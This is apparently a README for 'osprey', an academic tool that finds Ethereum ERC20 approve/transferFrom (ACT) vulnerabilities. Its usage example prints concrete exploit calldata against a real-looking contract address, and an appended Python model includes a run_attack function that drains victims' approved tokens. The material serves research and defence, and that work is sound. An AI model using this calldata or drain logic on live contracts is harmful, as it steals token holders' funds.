ucsb-seclab/osprey
Approve Once, Regret Forever: On the Exploitation of Ethereum’s ERC20 Approve-TransferFrom Ecosystem


This repository contains the code used for our USENIX Security 2025 paper Approve Once, Regret Forever: On the Exploitation of Ethereum’s ERC20 Approve-TransferFrom Ecosystem. Our system, osprey, can be used to find exploitable Approved-Controllable-TransferFrom (ACT) vulnerabilities on the Ethereum blockchain.

⚠️ Disclaimer

For ethical reasons, we are not releasing a fully automated "push-one-button" solution for the identification and automatic exploitation of vulnerable smart contracts. We instead open-source all the necessary scripts to demonstrate the approach presented in our paper. Interested researchers will have all the necessary code to replicate our work. In case something does not click, please reach out to us :)

Dependencies

To run osprey, you will need:

  • To install greed -- our symbolic execution engine for EVM smart contract binaries.
  • For some of the analyses, you will need access to an Ethereum (archive) node (e.g., go-ethereum, erigon).
  • For some of the analyses, you will need a database of historical (internal) transactions. We maintain our own (private) database, but you can also use other existing services (e.g., ether-sql).

Usage

The analyses are run as three separate scripts, each consuming the JSON report produced by the previous one. In the example below, `do_find_transferfrom.py` is given the stored data of a contract (keyed by its code hash), the program counter of the `CALL` that invokes `transferFrom`, and the 4-byte selector of the entry point that reaches it, and reports whether that `transferFrom` call site is controllable. `do_call_transferfrom.py` takes that report and produces the concrete calldata that drives the call (together with the return data the token is expected to give back, `oracle_returndata`); the `caller`, `token`, `arg_from` and `arg_to` fields of the attack report show which parts of the `transferFrom` are under the caller's control. `do_measure_attack_impact.py` then prices the resulting attack tuples. `ERC` selects the token standard and `BLOCK_NUMBER` the block at which the contract state is taken (it appears as `block` in the attack report).

```bash
# you can run the individual analyses in osprey with:

export ERC=ERC20
export BLOCK_NUMBER=17478994

./do_find_transferfrom.py /data/blockchain/contracts_data/d122e491fcae5428cc30bfee93216a93b633ccd87f02adcb7add763f509affbc 0x2575 0x0031b016
# > CONTROLLABLE TRANSFERFROM REPORT: {"codehash": "0xd122e491fcae5428cc30bfee93216a93b633ccd87f02adcb7add763f509affbc", "storage_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "code_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "call_pc": "0x2575", "four_bytes": "0031b016"}

./do_call_transferfrom.py '{"codehash": "0xd122e491fcae5428cc30bfee93216a93b633ccd87f02adcb7add763f509affbc", "storage_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "code_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "call_pc": "0x2575", "four_bytes": "0031b016"}'
# > ATTACK REPORT (uncertainty=0): {"block": 17478994, "proxy_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "storage_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "code_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "evm_call_pc": "0x2575", "caller": "0x4040404040404040404141404040404040404040", "callvalue": 0, "target": "0x4141414141414141414242414141414141414141", "token": "0x4141414141414141414242414141414141414141", "arg_from": "0x4242424242424242424343424242424242424242", "arg_to": "0x7F56230B3823d1a0968C3ceB3D00BA5E2271CE14", "arg_value_expected": 68, "arg_tokenid_expected": null, "calldata": "0031b01600000000000000000000000000000000000000000000000000000000000001044040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040400000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007f56230b3823d1a0968c3ceb3d00ba5e2271ce140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424242424242424242434342424242424242424200000000000000000000000041414141414141414142424141414141414141410000000000000000000000008000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002004040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000", "oracle_returndata": ["0000000000000000000000000000000000000000000000000000000000000001"]}

./do_measure_attack_impact.py '{"block": 17478994, "proxy_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "storage_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "code_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "evm_call_pc": "0x2575", "caller": "0x4040404040404040404141404040404040404040", "callvalue": 0, "target": "0x4141414141414141414242414141414141414141", "token": "0x4141414141414141414242414141414141414141", "arg_from": "0x4242424242424242424343424242424242424242", "arg_to": "0x7F56230B3823d1a0968C3ceB3D00BA5E2271CE14", "arg_value_expected": 68, "arg_tokenid_expected": null, "calldata": "0031b01600000000000000000000000000000000000000000000000000000000000001044040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040400000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007f56230b3823d1a0968c3ceb3d00ba5e2271ce1400000000000000000000000000000000000000000000000000000000000000000000000000000000000000004242424242424242424343424242424242424242000000000000000000000000414141414141414141424241414141414141414100000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002004040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000", "oracle_returndata": ["0000000000000000000000000000000000000000000000000000000000000001"]}'
# > Found 70 meaningful attack tuples after pricing. Total impact: $214161.31
```
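The Python model below is an added example and is not osprey code or the paper's artifact. It reproduces, on constructed state, the Approved-Controllable-TransferFrom pattern the scripts above hunt for: an ERC20 allowance model, a contract whose `transferFrom` call takes `token`, `from` and `to` straight from calldata, the hardened version that pins `from` to `msg.sender`, and an impact pricing step that, like the last script, values every (token, victim) tuple by what can actually be moved, i.e. the smaller of the standing allowance and the victim's current balance. All addresses, balances and prices are constructed for the example.

```python
# Added example, not osprey code: model of an ACT bug and of how its impact is priced.
# Every address, balance and USD price below is constructed.

MAX_UINT = 2**256 - 1  # the "infinite" approval value most dApps request


class ERC20:
    """Minimal ERC20 allowance model (approve / transferFrom semantics only)."""

    def __init__(self, symbol: str, price_usd: float):
        self.symbol = symbol
        self.price_usd = price_usd  # assumed price per whole token
        self.balances: dict[str, int] = {}
        self.allowances: dict[tuple[str, str], int] = {}  # (owner, spender) -> amount

    def mint(self, who: str, amount: int) -> None:
        self.balances[who] = self.balances.get(who, 0) + amount

    def balance_of(self, who: str) -> int:
        return self.balances.get(who, 0)

    def allowance(self, owner: str, spender: str) -> int:
        return self.allowances.get((owner, spender), 0)

    def approve(self, owner: str, spender: str, amount: int) -> None:
        # `owner` is msg.sender of approve(); `spender` is usually a contract.
        self.allowances[(owner, spender)] = amount

    def transfer_from(self, msg_sender: str, owner: str, to: str, amount: int) -> bool:
        # The allowance consulted is the one granted to msg.sender, i.e. the contract
        # calling transferFrom, never the account that triggered that contract.
        if self.allowance(owner, msg_sender) < amount or self.balance_of(owner) < amount:
            raise PermissionError("transferFrom: insufficient allowance or balance")
        if self.allowance(owner, msg_sender) != MAX_UINT:
            self.allowances[(owner, msg_sender)] -= amount
        self.balances[owner] -= amount
        self.balances[to] = self.balances.get(to, 0) + amount
        return True


class VulnerableSpender:
    """Contract with an ACT bug: token, from and to are all taken from calldata."""
    address = "0xSPENDER"  # constructed address

    def pull(self, msg_sender: str, token: ERC20, from_: str, to: str, amount: int) -> None:
        # BUG: nothing ties `from_` to msg_sender, so anyone can spend any allowance
        # ever granted to this contract, on any token, and send it anywhere.
        token.transfer_from(self.address, from_, to, amount)


class FixedSpender:
    """Same function, hardened: the account being debited is always msg.sender."""
    address = "0xSPENDER"

    def pull(self, msg_sender: str, token: ERC20, to: str, amount: int) -> None:
        token.transfer_from(self.address, msg_sender, to, amount)


def exploitable_amount(token: ERC20, victim: str, spender: str) -> int:
    """What can be drained right now: bounded by both allowance and balance."""
    return min(token.allowance(victim, spender), token.balance_of(victim))


def measure_impact(spender: str, tokens: list[ERC20], approvers: dict[str, list[str]]):
    """Price every (token, victim) tuple with a non-zero exploitable amount.

    `approvers` maps token symbol -> accounts that approved `spender`; on chain this
    set would be recovered from historical Approval events.
    """
    tuples = []
    for token in tokens:
        for victim in approvers.get(token.symbol, []):
            amount = exploitable_amount(token, victim, spender)
            if amount > 0:
                tuples.append((token.symbol, victim, amount, amount * token.price_usd))
    return tuples, round(sum(t[3] for t in tuples), 2)


def run_attack(spender: VulnerableSpender, token: ERC20, victim: str, attacker: str) -> int:
    """Attacker drains the victim through the vulnerable contract; returns amount moved."""
    amount = exploitable_amount(token, victim, spender.address)
    spender.pull(attacker, token, victim, attacker, amount)
    return amount


def build_scenario():
    """Constructed state: two tokens, three accounts that approved the spender."""
    usdc = ERC20("USDC", 1.0)
    wbtc = ERC20("WBTC", 60000.0)
    usdc.mint("0xALICE", 5_000)
    wbtc.mint("0xBOB", 2)
    usdc.approve("0xALICE", VulnerableSpender.address, MAX_UINT)  # infinite approval
    wbtc.approve("0xBOB", VulnerableSpender.address, 1)           # capped approval
    usdc.approve("0xCAROL", VulnerableSpender.address, MAX_UINT)  # approved, but 0 balance
    approvers = {"USDC": ["0xALICE", "0xCAROL"], "WBTC": ["0xBOB"]}
    return usdc, wbtc, approvers
```

Two details worth noticing: Carol's infinite approval contributes nothing until she holds a balance, which is why impact has to be measured against current balances rather than allowances alone; and the attacker never needs an allowance of their own, because the allowance checked by `transferFrom` is the one granted to the vulnerable contract, which is exactly what the `FixedSpender` variant neutralises by refusing to debit anyone but `msg.sender`.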
